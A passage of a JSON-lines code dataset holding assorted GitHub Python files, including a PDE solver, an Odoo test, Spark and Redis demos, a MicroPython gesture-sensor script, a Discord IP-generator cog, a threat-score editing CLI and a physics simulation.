label2 = 't ={0:0.2f} secs'.format(time[2])\n label3 = 't ={0:0.2f} secs'.format(time[3])\n label4 = 't ={0:0.2f} secs'.format(time[4])\n label5 = 't ={0:0.2f} secs'.format(time[5])\n\n plt.gca().legend((label0,label1,label2, label3, label4, label5), loc = 'upper right')\n plt.ylim(298,678)\n plt.xlim(0,0.12)\n plt.show()\n\n\ndef solver_FTCS():\n\n\n spaceLocation, timeLocation = meshing()\n up = initialCondition(spaceLocation)\n uc = np.zeros(len(spaceLocation))\n u = np.zeros((6, len(spaceLocation)))\n time = []\n u_ss = np.full(len(spaceLocation), T_amb)\n\n for t in range(1, len(timeLocation)):\n\n for i in range(1, len(spaceLocation)-1):\n\n uc[i] = up[i]+SIGMA*(up[i+1]-2*up[i]+up[i-1])+((heatSource()*DELTA_T)/(DENSITY*THERMAL_COND))\n\n uc[0] = (uc[1] + BETA*T_amb)/(1+BETA)\n uc[len(spaceLocation)-1] = (uc[len(spaceLocation)-2]+BETA*T_amb)/(1+BETA)\n up = uc\n\n if timeLocation[t] == N1*DELTA_T:\n u[0,:] = up\n time.append(N1*DELTA_T)\n\n elif timeLocation[t] == N2*DELTA_T:\n u[1,:] = up\n time.append(N2*DELTA_T)\n\n elif timeLocation[t] == N3*DELTA_T:\n u[2,:] = up\n time.append(N3 * DELTA_T)\n\n elif timeLocation[t] == N4 * DELTA_T:\n u[3, :] = up\n time.append(N4 * DELTA_T)\n\n elif timeLocation[t] == N5 * DELTA_T:\n u[4, :] = up\n time.append(N5 * DELTA_T)\n\n elif timeLocation[t] == N6 * DELTA_T:\n u[5, :] = up\n time.append(N6 * DELTA_T)\n\n u_check = np.subtract(up, u_ss)\n\n if (u_check < 0.001).all():\n print(\"Steady state reached at {0:0.2f} secs\".format(timeLocation[t]))\n break\n\n plottemp(u, spaceLocation, time)\n\n\n\n\nsolver_FTCS()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"shadzzz90/Solving-Partial-Differential-Equations-using-Python","sub_path":"Transient_FTCS.py","file_name":"Transient_FTCS.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40671740897","text":"from odoo.tests.common import SavepointCase\n\n\nclass TestHrExpenseSequence(SavepointCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.expense_model = cls.env[\"hr.expense\"]\n cls.expense_sheet_model = cls.env[\"hr.expense.sheet\"]\n cls.product = cls.env.ref(\"product.product_product_4\")\n\n employee_home = cls.env[\"res.partner\"].create({\"name\": \"Employee Home Address\"})\n cls.employee = cls.env[\"hr.employee\"].create(\n {\"name\": \"Employee\", \"address_home_id\": employee_home.id}\n )\n cls.expense = cls.create_expense(cls, \"Expense\")\n\n def create_expense(self, name):\n \"\"\"Returns an open expense\"\"\"\n expense = self.expense_model.create(\n {\n \"name\": name,\n \"employee_id\": self.employee.id,\n \"product_id\": self.product.id,\n \"unit_amount\": self.product.standard_price,\n \"quantity\": 1,\n }\n )\n expense.action_submit_expenses()\n return expense\n\n def test_create_sequence(self):\n # Test number != '/'\n self.sheet = self.expense_sheet_model.create(\n {\"name\": \"Expense Report\", \"employee_id\": self.employee.id}\n )\n self.assertNotEqual(self.sheet.number, \"/\", \"Number create\")\n # Test number 1 != number 2\n expense_number_1 = self.sheet.number\n expense2 = self.sheet.copy()\n expense_number_2 = expense2.number\n self.assertNotEqual(expense_number_1, expense_number_2, \"Numbers are different\")\n","repo_name":"OCA/hr-expense","sub_path":"hr_expense_sequence/tests/test_hr_expense_sequence.py","file_name":"test_hr_expense_sequence.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"31"} +{"seq_id":"12377777353","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import length\n\n# Local SparkSession\nspark = (SparkSession\n .builder\n .master(\"local[*]\")\n .appName(\"Socket-DataFrame_Nothing-StdOut\")\n .getOrCreate())\n\n# 1. Input data: DataFrame representing the stream of input lines from socket\ndf = (spark\n .readStream\n .format(\"socket\")\n .option(\"host\", \"localhost\")\n .option(\"port\", 9999)\n .load())\n\n# 2. Data processing: nothing\n\n# 3. Output data: show result in the console\nquery = (df\n .writeStream\n .outputMode(\"append\")\n .format(\"console\")\n .start())\n\nquery.awaitTermination()\n","repo_name":"bonigarcia/spark-examples","sub_path":"streaming/socket-dataframe_nothing-stdout.py","file_name":"socket-dataframe_nothing-stdout.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"7021602852","text":"def getFunktion(name):\r\n file = open(name+\".txt\", \"r\")\r\n rv = []\r\n for line in file.readlines():\r\n ll = line.split(\",\")\r\n rv.append((float(ll[0]), float(ll[1])))\r\n return rv\r\n\r\ndef getFktValue(locp, x):\r\n getmn = False\r\n for i in range(len(locp)-1):\r\n if (locp[i][0] <= x) and (locp[i+1][0] > 0):\r\n m = (locp[i+1][1]-locp[i][1])/(locp[i+1][0]-locp[i][0])\r\n n = locp[i+1][1]-m*locp[i+1][0]\r\n getmn = True\r\n if not getmn:\r\n return -1\r\n return m*x+n\r\n\r\ndef getError(locp, point, maxy):\r\n fy = getFktValue(locp, point[0])\r\n if fy > maxy/2:\r\n maxe = fy\r\n else:\r\n maxe = maxy - fy\r\n return(round(abs(fy-point[1]),8), round(maxe, 8))","repo_name":"mgdoep/_StEX","sub_path":"lndw/drawfkt.py","file_name":"drawfkt.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73371055767","text":"import micropython # For emergency exception buffer\nfrom pyb import I2C # For i2c bus access\nfrom APDS_9960 import APDS_9960 # Gesture control driver\nimport utime\n\n# Buffer for interrupt error messages\nmicropython.alloc_emergency_exception_buf(100)\n\n############################################################\n# Application Constants\n############################################################\n\n############################################################\n# Application Variables\n############################################################\n# Setup the MCU and application code to starting conditions\n# The blue LED will start on, the yellow LED will be off\ndef System_Init():\n print(\"Initializing system ...\")\n print(\"Starting application ...\")\n\n############################################################\n#\n# Start script execution ...\n#\n############################################################\n# Initialize the system\nSystem_Init()\n\n# Create a uart object, uart4, and setup the serial parameters\ni2c = I2C(1) # create on bus 1\ni2c = I2C(1, I2C.MASTER) # create and init as a master\ni2c.init(I2C.MASTER, baudrate=400000) # init as a master\n\n# Initialize the pins that will be used for LED control\nLED_Forward = pyb.Pin('PD14', pyb.Pin.OUT_PP)\nLED_Backward = pyb.Pin('PB0', pyb.Pin.OUT_PP)\nLED_Left = pyb.Pin('PB4', pyb.Pin.OUT_PP)\nLED_Right = pyb.Pin('PA3', pyb.Pin.OUT_PP)\n\n# Set the LED's initial state to off\nLED_Forward.value(1)\nLED_Backward.value(1)\nLED_Left.value(1)\nLED_Right.value(1)\n\n# Initialize the gesture driver and disable debug messages\nGesture = APDS_9960(i2c, False)\n\nGestureDetected = False\nGestureDetectedTime = utime.ticks_ms()\n\n# Main application loop\nwhile True:\n\n Result = Gesture.Detect()\n\n # Determine if there has been a validated gesture, if so tell us!\n if Result == APDS_9960.GESTURE_LEFT:\n GestureDetected = True\n GestureDetectedTime = utime.ticks_ms()\n LED_Left.low()\n print(\"Gesture Left!\")\n elif Result == APDS_9960.GESTURE_RIGHT:\n GestureDetected = True\n GestureDetectedTime = utime.ticks_ms()\n LED_Right.low()\n print(\"Gesture Right!\")\n elif Result == APDS_9960.GESTURE_FORWARD:\n GestureDetected = True\n GestureDetectedTime = utime.ticks_ms()\n LED_Forward.low()\n print(\"Gesture Forward!\")\n elif Result == APDS_9960.GESTURE_BACKWARD:\n GestureDetected = True\n GestureDetectedTime = utime.ticks_ms()\n LED_Backward.low()\n print(\"Gesture Backward!\") \n\n if GestureDetected is True:\n if (utime.ticks_ms() - GestureDetectedTime) > 5000:\n GestureDetected = False\n LED_Backward.high()\n LED_Forward.high()\n LED_Right.high()\n LED_Left.high()","repo_name":"PacktPublishing/MicroPython-Projects","sub_path":"Chapter07/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"31"} +{"seq_id":"37733679772","text":"import pandas as pd\nimport os,sys\n\n\n\npaths_dir = '/home/rpizarro/noise/XValidFns'\n\nfn = os.path.join(paths_dir,'filtered_failed_scanpaths_20201021.csv')\ndf = pd.read_csv(fn,index_col=0)\ncols = list(df)\n# drop Unanmed last four columns\ncols = cols[:-4]\ndf = df[cols]\nprint(list(df))\n# Drop NA from dataframe\ndf.dropna(subset=['ScanPath'],inplace=True)\n\nfn = os.path.join(paths_dir,'multiple_artifact','noise_scans.tj.csv')\nnoise = pd.read_csv(fn,index_col=0)\ncols_art = ['intensity', 'motion', 'coverage']\nnoise['max_val'] = noise.max(axis=1)\nnoise[cols_art] = noise[cols_art].div(noise.max_val, axis=0).round(1)\nnoise.drop(['max_val'],axis=1,inplace=True)\nprint(noise)\nprint(list(noise))\n\nfn = os.path.join(paths_dir,'multiple_artifact','trials_used_noise.tj.csv')\ntrials_used = pd.read_csv(fn,index_col=0)\nprint(trials_used.sum())\n# Only artifact that is properly identified\nkeywords = ['motion']\n# keywords = ['motion','intensity','artifScanPathact','coverage']\n\nfor k in keywords:\n df_k = df[df['Comments'].str.contains(k)]\n df_p = df_k[df_k['ScanPath'].str.contains('mnc.gz')]\n df_p = df_p.drop_duplicates(subset=['ScanPath'])\n print('Using keyword >>>{}<<< results in nb_files : {}'.format(k,df_p.shape[0]))\n # count = df_p[['Trial','Comments']].groupby(['Trial']).agg(['count'])\n count = df_p[['Trial','Comments']].groupby(['Trial']).count()\n for p in df_p['ScanPath'].drop_duplicates():\n p_actual = os.path.join('/data/datasets/FAILEDSCANS',p[1:])\n # print(p_actual)\n if not os.path.exists(p_actual):\n print('We could not find : {}'.format(p_actual))\n elif any(noise['path'].astype(str).str.contains(p_actual)):\n print('\\nWe already added : {}\\n'.format(p_actual))\n print(noise['path'].astype(str).str.contains(p_actual))\n else:\n print('We will append as movement : {}'.format(p_actual))\n row = pd.DataFrame([[0.0,0.0,1.0,0.0,p_actual]], columns = list(noise))\n noise = noise.append(row,ignore_index=True)\n # print(df_p[['Path','ScanPath']])\n # print(df_k['Comments'])\n\n\nsys.exit()\n\nprint(noise)\nfn = os.path.join(paths_dir,'multiple_artifact','noise_scans.tj.new_trials.csv')\nprint('Saving noise to : {}'.format(fn))\nnoise.to_csv(fn)\n\ncount = count.rename(columns={\"Comments\": \"noise\"})\n\nprint(list(count))\ncount = count.reset_index()\ncount.index = count.index.rename('index')\ncount.rename(columns={'Trial':'trial'},inplace=True)\nprint(count)\nfn_count = os.path.join(paths_dir,'motion_count_by_trial.csv')\nprint('Saving count to : {}'.format(fn_count))\n# count.to_csv(fn_count)\n\nprint(trials_used)\n# print(count[['trial','noise']])\n\ntrials_used = trials_used.append(count[['trial','noise']],ignore_index=True)\n\ntrials_used.sort_values(by=['trial'],inplace=True)\ntrials_used = trials_used.reset_index(drop=True)\n\nprint(trials_used)\nfn = os.path.join(paths_dir,'multiple_artifact','trials_used_noise.tj.new_trials.csv')\nprint('Saving noise to : {}'.format(fn))\ntrials_used.to_csv(fn)\n\n\n\n\n\n","repo_name":"AS-Lab/Pizarro-et-al-2023-DL-detects-MRI-artifacts","sub_path":"research/exp/noise.new_scans_artifacts.py","file_name":"noise.new_scans_artifacts.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"39239340109","text":"def mis(x,N):\n Dic = \"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n a = int(x)\n b = x - a\n result1 = []\n result2 = []\n result = \"\"\n while a != 0:\n result1.append(Dic[a%N])\n a //= N\n for i in range(16):\n if b==0:\n break\n result2.append(Dic[int(b*N)])\n b = b*N-int(b*N)\n if len(result1) == 0:\n result += '0'\n else:\n for i in range(len(result1)):\n result += result1.pop()\n if len(result2) != 0:\n result += '.' \n for i in range(len(result2)):\n result += result2.pop(0)\n return result\nwhile True:\n a=float(input(\"输入:\\n\"))\n b=int(input())\n print(\"输出\")\n print(mis(a,b))","repo_name":"mhq1065/respose","sub_path":"homework_7_py/9.2.1.py","file_name":"9.2.1.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31003383077","text":"import redis\nr = redis.Redis(host=\"localhost\",port=6379)\nif __name__ == '__main__':\n r.set(\"fruit\",\"苹果\") #设置字符串\n data = r.get(\"fruit\")\n print(data.decode()) #从Redis中获取的数据,要进行解码\n r.hmset(\"student:101\",{\"name\":\"马云\",\"age\":29,\"score\":93.5})\n data1 = r.hgetall(\"student:101\")\n resultData = {}\n for k,v in data1.items():\n resultData[k.decode()] = v.decode()\n print(resultData)","repo_name":"SpCrazy/crazy","sub_path":"code/Day5redis/RedisDemo/redisDemo.py","file_name":"redisDemo.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9790368568","text":"from discord.ext import commands\n\nfrom secrets import randbits\nfrom more_itertools import sliced\nfrom itertools import cycle\n\n\nclass Ip(commands.Cog):\n \"\"\"Command that returns random private IPv6/IPv4 addresses.\"\"\"\n\n ip4_func = (\n lambda: randbits(24) | 10 << 24,\n lambda: randbits(20) | 172 << 24 | 16 << 16,\n lambda: randbits(16) | 192 << 24 | 168 << 16,\n )\n ip6_func = (lambda: randbits(120) | 0xFD << 120,)\n\n @classmethod\n def to_ipv6(cls, ip_bits):\n return \":\".join(sliced(hex(ip_bits)[2:], 4))\n\n @classmethod\n def to_ipv4(cls, ip_bits):\n return \".\".join(str(0xFF & ip_bits >> i) for i in range(24, -1, -8))\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def ip(self, ctx, count: int = 1):\n count = max(1, count)\n ip = cycle(self.ip6_func)\n await ctx.send(\n \"\\n\".join(map(self.to_ipv6, sorted(next(ip)() for _ in range(count))))\n )\n\n @commands.command()\n async def ip4(self, ctx, count: int = 1):\n count = max(1, count)\n ip = cycle(self.ip4_func)\n await ctx.send(\n \"\\n\".join(map(self.to_ipv4, sorted(next(ip)() for _ in range(count))))\n )\n","repo_name":"Magma5/sysbot-helper-bot","sub_path":"src/sysbot_helper/cogs/ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"29502640321","text":"import sys\nimport json\nfrom collections import OrderedDict\nfrom datalake import ThreatType, OverrideType\nfrom datalake import Datalake\nfrom datalake.common.logger import logger\nfrom datalake_scripts.common.base_script import BaseScripts\nfrom datalake_scripts.helper_scripts.utils import (\n save_output,\n parse_threat_types,\n split_list,\n flatten_list,\n)\n\n\ndef main(override_args=None):\n \"\"\"Method to start the script\"\"\"\n # Load initial args\n parser = BaseScripts.start(\"Edit scores of a specified list of ids (hashkeys)\")\n parser.add_argument(\n \"hashkeys\",\n help=\"hashkeys of the threat to edit score.\",\n nargs=\"*\",\n )\n parser.add_argument(\n \"-i\",\n \"--input_file\",\n help=\"hashkey txt file, with one hashkey by line.\",\n )\n parser.add_argument(\n \"-t\",\n \"--threat_types\",\n nargs=\"+\",\n help=\"choose specific threat types and their score, like: ddos 50 scam 15\",\n default=[],\n action=\"append\",\n )\n parser.add_argument(\n \"-w\",\n \"--whitelist\",\n help=\"Whitelist the input, equivalent to setting all threat types at 0.\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"--permanent\",\n help=\"\"\"Permanent: all values will override any values provided by both newer and\n older IOCs. Newer IOCs with override_type permanent can still override old permanent changes.\n temporary: all values should override any values provided by older IOCs,\n but not newer ones.\"\"\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"--lock\",\n help=\"sets override_type to lock. Scores won't be updated by the algorithm for three months. Default is \"\n \"temporary\",\n action=\"store_true\",\n )\n if override_args:\n args = parser.parse_args(override_args)\n else:\n args = parser.parse_args()\n logger.debug(f\"START: edit_score.py\")\n\n if not args.hashkeys and not args.input_file:\n parser.error(\"either a hashkey or an input_file is required\")\n\n if args.permanent and args.lock:\n parser.error(\"Only one override type is authorized\")\n\n if args.permanent:\n override_type = OverrideType.PERMANENT\n elif args.lock:\n override_type = OverrideType.LOCK\n else:\n override_type = OverrideType.TEMPORARY\n\n if args.whitelist:\n parsed_threat_type = get_whitelist_threat_types()\n else:\n args.threat_types = flatten_list(args.threat_types)\n if not args.threat_types or len(args.threat_types) % 2 != 0:\n parser.error(\"threat_types invalid ! should be like: ddos 50 scam 15\")\n parsed_threat_type = parse_threat_types(args.threat_types)\n # removing duplicates while preserving order\n hashkeys = args.hashkeys\n if args.input_file:\n retrieve_hashkeys_from_file(args.input_file, hashkeys)\n if not hashkeys:\n raise parser.error(\"No hashkey found in the input file.\")\n hashkeys_chunks = list(\n split_list(list(OrderedDict.fromkeys(hashkeys)) if hashkeys else [], 100)\n )\n\n dtl = Datalake(env=args.env, log_level=args.loglevel)\n response_list = []\n for index, hashkeys in enumerate(hashkeys_chunks):\n try:\n dtl.Threats.edit_score_by_hashkeys(\n hashkeys, parsed_threat_type, override_type\n )\n except ValueError as e:\n logger.warning(\n f\"\\x1b[6;30;41mBATCH {str(index+1)}/{len(list(hashkeys_chunks))}: FAILED\\x1b[0m\"\n )\n for hashkey in hashkeys:\n response_list.append(hashkey + \": FAILED\")\n logger.warning(f\"\\x1b[6;30;41m{hashkey} : FAILED\\x1b[0m\")\n logger.warning(e)\n else:\n logger.info(\n f\"\\x1b[6;30;42mBATCH {str(index+1)}/{len(list(hashkeys_chunks))}: OK\\x1b[0m\"\n )\n for hashkey in hashkeys:\n response_list.append(hashkey + \": OK\")\n\n if args.output:\n save_output(args.output, response_list)\n logger.info(f\"Results saved in {args.output}\\n\")\n logger.debug(f\"END: edit_score.py\")\n\n\ndef get_whitelist_threat_types():\n return [{\"threat_type\": threat_type, \"score\": 0} for threat_type in ThreatType]\n\n\ndef retrieve_hashkeys_from_file(input_file, hashkeys):\n with open(input_file, \"r\", encoding=\"utf-8\") as input_file:\n for line in input_file:\n line = line.strip()\n if line:\n hashkeys.append(line)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"cert-orangecyberdefense/datalake","sub_path":"datalake_scripts/scripts/edit_score.py","file_name":"edit_score.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"31"} +{"seq_id":"784049513","text":"\"\"\"\nOnline logging script to be run concurrently with make train.\n\"\"\"\nimport functools\nimport itertools\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport sys\n\nimport random\n\nFILE_PATH = \"log.csv\"\n\nclass Plotter:\n def __init__(self, x1, y1, x2, y2, x3, y3, getter):\n self._fig = plt.figure()\n self._ax1 = self._fig.add_subplot(3, 1, 1)\n self._ax2 = self._fig.add_subplot(3, 1, 2)\n self._ax3 = self._fig.add_subplot(3, 1, 3)\n\n self._data_y1 = y1\n self._data_x1 = x1\n self._data_y2 = y2\n self._data_x2 = x2\n self._data_y3 = y3\n self._data_x3 = x3\n\n self._data_getter = getter\n\n def animate(self):\n ani = animation.FuncAnimation(self._fig, self._draw, interval=1)\n plt.tight_layout()\n plt.show()\n\n def _update_data(self):\n new_y1, new_y2, new_y3 = self._data_getter.get()\n self._data_y1.extend(new_y1)\n self._data_y2.extend(new_y2)\n self._data_y3.extend(new_y3)\n return new_y1, new_y2, new_y3\n\n def _draw(self, frame):\n new_y1s, new_y2s, new_y3s = self._update_data()\n\n if new_y1s:\n new_x1s = range(len(self._data_x1), len(self._data_x1) + len(new_y1s))\n new_x2s = range(len(self._data_x2), len(self._data_x2) + len(new_y2s))\n new_x3s = range(len(self._data_x3), len(self._data_x3) + len(new_y3s))\n self._data_x1.extend(new_x1s)\n self._data_x2.extend(new_x2s)\n self._data_x3.extend(new_x3s)\n\n linewidth = max(0.005, min(1.0, 10 / math.log(len(self._data_x1))))\n self._ax1.clear()\n self._ax1.plot(self._data_x1, self._data_y1, linewidth=linewidth)\n self._ax1.set_title(\"Loss\")\n self._ax2.clear()\n self._ax2.plot(self._data_x2, self._data_y2, linewidth=linewidth)\n self._ax2.set_title(\"Accuracy\")\n self._ax3.clear()\n self._ax3.plot(self._data_x3, self._data_y3, linewidth=linewidth)\n self._ax3.set_title(\"F1Score\")\n\nclass Getter:\n \"\"\"\n Class that provides a 'get' function for retrieving one data point at a time.\n \"\"\"\n def __init__(self, fpath):\n \"\"\"\n :param fpath: The path to the file to read from.\n :param dataindex: A parameter that indicates which index in the tuple of data items on a line to get.\n \"\"\"\n self.fpath = fpath\n self.epoch_num = 0\n\n def get(self):\n epoch_str = lambda epnum : \"----- \" + str(epnum) + \" -----\"\n with open(self.fpath) as f:\n # Take only the lines after the most recent epoch\n lines = [line.strip() for line in itertools.dropwhile(lambda x: x.strip() != epoch_str(self.epoch_num), f)]\n lines = [line.strip() for line in itertools.takewhile(lambda x: x.strip() != epoch_str(self.epoch_num + 1), lines)]\n lines = [line for line in lines if line.strip() != \"\" and not line.startswith('-')]\n tups = [line.split(',') for line in lines]\n data_x1 = [float(tup[0].strip()) for tup in tups]\n data_x2 = [float(tup[1].strip()) for tup in tups]\n data_x3 = [float(tup[2].strip()) for tup in tups]\n if data_x1:\n self.epoch_num += 1\n return data_x1, data_x2, data_x3\n\nif __name__ == \"__main__\":\n acc = 0\n loss = 1\n g = Getter(FILE_PATH)\n plotter = Plotter([0, 1], [0, 1], [0, 1], [0, 1], [0, 1], [0, 1], g)\n plotter.animate()\n\n","repo_name":"MaxStrange/ArtieInfant","sub_path":"scratch/cnn/src/visualization/visualizetraining.py","file_name":"visualizetraining.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40847879411","text":"import sys\n\nY, X, N = map(int, sys.stdin.readline().strip().split())\n\nboard = [list(sys.stdin.readline().strip())\n for _ in range(Y)]\n\nfor y in range(Y):\n for x in range(X):\n if board[y][x] == 'O':\n board[y][x] = 0\n\ntime_now = 1\n\n\nwhile True:\n if time_now == N:\n break\n \n time_now += 1\n \n # 폭탄 설치부\n for y in range(Y):\n for x in range(X):\n if board[y][x] == '.':\n board[y][x] = time_now\n \n if time_now == N:\n break\n\n # 폭탄 폴발부\n time_now += 1\n tmp = []\n for y in range(Y):\n for x in range(X):\n if board[y][x] + 3 == time_now:\n for dy, dx in [(0,0), (1,0),(-1,0),(0,1),(0,-1)]:\n if 0<=y+dyki and j<10-ki and i>ki and i<10-ki:\n mask1[i, j] = 1 # int(np.sqrt(i**2+j**2))\n\n l.setByFourier(fft=fhat)\n forcage_curve = l.fft # 5*10**-4\n\n res = []\n name = \"sim_12\"\n description = \"local run\"\n\n time = 500 #1200 #*(10**0)\n dt = 10*10**-5\n\n startime=0\n starti = 0\n time_pass = 0\n time_rest = 0\n\n nt = int(time/dt)\n savet = int(1/dt)#int(nt*0.05) if nt>20 else 1 #int(.05/dt)\n plott = int(nt*0.1) if nt>10 else 1\n checkt = int(.01/dt) #int(nt*0.001) if nt>1000 else 1\n\n l0 = l\n eng = 0\n engz = 0\n\n try:\n with open('{}/lastprint.txt'.format(path)) as f:\n read_data = f.read()\n gversion = int(read_data.split('\\n')[0])\n _print(\"gversion was {}\".format(gversion),debug_level=3,save=False)\n except:\n gversion = 0\n\n\n L = fun(nx,nx)\n a = fun(nx,nx)\n A = fun(nx,nx)\n b = fun(nx,nx)\n B = fun(nx,nx)\n g = fun(nx,nx)\n G = fun(nx,nx)\n\n nua = 0 #.000001\n nub = 0 #.000001\n nug = 0 #.000001\n nul = 0 # 5*10**-7\n\n res0 = (0,l.d.copy(),L.d.copy(),0)\n hatmodule0 = hatmodule(res0[1],res0[2],l.dx)\n\n # line23 = (np.linspace(1,l.dimx,l.dimx)[:int(l.dimx/3)])**(-2/3)\n # q = np.argmax(hatmodule0)\n # line23 =line23/line23[q]*hatmodule0[q]\n\n forcage = None\n forcage_coef = 10**-5 #10**-5\n forcage_sign = 0\n forcage_signi = 0\n\n if not os.path.exists(\"{}/{}/\".format(datadir,name)):\n _print('created',save=False)\n os.chdir(datadir)\n os.mkdir(name)\n os.chdir('..')\n truei = 0\n for i in range(len(os.listdir(\"{}/{}/\".format(datadir,name)))):\n _print('{}/{}/{}_{}.npy'.format(datadir,name,name,i),save=False)\n if os.path.isfile('{}/{}/{}_{}.npy'.format(datadir,name,name,i)):\n truei = i #break\n _print(truei,save=False)\n\n truei -= 1\n if truei>1 and 1:\n try:\n res0 = (np.load('{}/{}/{}_{}.npy'.format(datadir,name,name,truei)))\n startime = res0[0]\n starti = int(startime/dt)\n l.upd(res0[1])\n L.upd(res0[2])\n forcage = res0[4]\n forcage_coef = res0[5]\n _print(\"will start calculation from t={} (i={})\".format(res0[0],truei),save=False, debug_level=3)\n except Exception as e:\n _print(e)\n else:\n _print(\"start new calculation\",save=False)\n gversion+=1\n\n _print(\"Version now is {}\".format(gversion), save=False)\n\n f = open(\"{}/lastinfo.txt\".format(path), \"w\")\n f.write(\"{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\".format(gversion, name, description, nx, int(nt / savet), nt, savet, dt, l.dx, ki, nul))\n f.close()\n\n #--------------------------------------------------------------------------------------------------------------------------------------------------\n\n\n sdif = stackdif(25)\n\n _print(\"time={:.3f}; nt={:.0f}; savet = {:.4f}; plott = {:.4f}; checkt= {:.4f}\".format(nt * dt, nt, savet * dt,\n plott * dt, checkt * dt), debug_level=3)\n # res.append((0,l.d.copy(),L.d.copy(),0))\n start = datetime.datetime.now()\n\n Lold = None\n\n for it in range(starti, nt):\n # 1) l'=L\n lf = ((3./ 2.*L.d - 1./2.*L.do)*dt +l.d)\n\n # 2) dxy(g) = -2(dx l)(dy l)\n gf = l.derx() * l.dery()\n gf, gfft = calculateDer(gf, g.dimx, g.dx, direc='x', n=-1, retfft=True)\n gf = -2*calculateDer(gf, g.dimy, g.dy, direc='y', n=-1, fft=gfft)\n\n # 3) g'=G + nug*(l,xx+l,yy)\n\n Gf = (2. * ((gf - g.d) / dt) + G.d) / 3\n #- nug * (calculateDer(gf, g.dimx, g.dx, direc='x', n=2, fft=gfft) + calculateDer(gf, g.dimy, g.dy, direc='y', n=2, fft=gfft)) / 2. +\n # - nug * (g.derx(n=2) + g.dery(n=2))/ 2.)\n\n # 4) L' = ...\n\n Lnew = (calculateDer((1 + a.d - b.d + g.d) * l.derx(), l.dimx, l.dx, direc='x', n=1) +\n calculateDer((1 - a.d + b.d + g.d) * l.dery(), g.dimy, l.dy, direc='y', n=1) -\n (A.d + B.d - G.d) * L.d) * ((1 - (a.d + b.d - g.d))) # ((a.d+b.d-g.d)**2))**(1)\n\n if type(Lold) == type(None): Lold = Lnew\n Lf = (3 * Lnew / 2 - Lold / 2) * dt + L.d + nul * (L.derx(n=2,mask=mask1) + L.dery(n=2,mask=mask1)) * dt\n Lold = Lnew\n\n # Lf = (3 * ((1 + a.d - b.d + g.d) * l.derx(n=2) + (1 - a.d + b.d + g.d) * l.dery(n=2) +\n # (a.derx() - b.derx() + g.derx()) * l.derx() + (-a.dery() + b.dery() + g.dery()) * l.dery()\n # - (A.d + B.d - G.d) * L.d) * ((1 - (a.d + b.d - g.d) + ((a.d + b.d - g.d) ** 2)) ** (1)) / 2 -\n # ((1 + a.do - b.do + g.do) * calculateDer(l.do, l.dimx, l.dx, direc='x', n=2) +\n # (1 - a.do + b.do + g.do) * calculateDer(l.do, l.dimy, l.dy, direc='y', n=2) +\n # (calculateDer(a.do, a.dimx, a.dx, direc='x', n=1) -\n # calculateDer(b.do, b.dimx, b.dx, direc='x', n=1) +\n # calculateDer(g.do, g.dimx, g.dx, direc='x', n=1)) * calculateDer(l.do, l.dimx, l.dx, direc='x', n=1) +\n # (-calculateDer(a.do, a.dimy, a.dy, direc='y', n=1) +\n # calculateDer(b.do, b.dimy, b.dy, direc='y', n=1) +\n # calculateDer(g.do, g.dimy, g.dy, direc='y', n=1)) * calculateDer(l.do, l.dimy, l.dy, direc='y', n=1) -\n # (A.do + B.do - G.do) * L.do) * ((1 - (a.do + b.do - g.do) + ((a.do + b.do - g.do) ** 2)) ** (1)) / 2\n # ) * dt + L.d + nul * (L.derx(n=2) + L.dery(n=2)) * dt\n\n # rnd = np.random.random(size=nx * nx).reshape((nx, nx))\n # forcage_curve = forcage_curve\n\n l.upd(lf)#, forcage=forcage, forcage_fft=forcage_curve, forcage_mode='add_fft')\n g.upd(gf)\n G.upd(Gf)\n\n # 5)\n Af = Lf * l.derx()\n Af = -2 * calculateDer(Af, l.dimx, l.dx, direc='x', n=-1)\n\n # 6)\n Bf = Lf * l.dery()\n Bf = -2 * calculateDer(Bf, l.dimy, l.dy, direc='y', n=-1)\n\n # 7)\n af = (3. * Af / 2 - A.d / 2.) * dt + a.d # + nua * (a.derx(n=2) + a.dery(n=2)))\n\n # 8)\n bf = (3. * Bf / 2 - B.d / 2.) * dt + b.d # + nub * (b.derx(n=2) + b.dery(n=2))) * dt\n\n # l.upd(lf)\n L.upd(Lf)\n a.upd(af)\n A.upd(Af)\n b.upd(bf)\n B.upd(Bf)\n\n if it % checkt == 0:\n eng1 = energy(l=l.d, L=L.d, dx=l.dx)\n sdif.push(eng1)\n if engz == 0:\n engz = eng1\n elif forcage != None:\n if sdif.full and 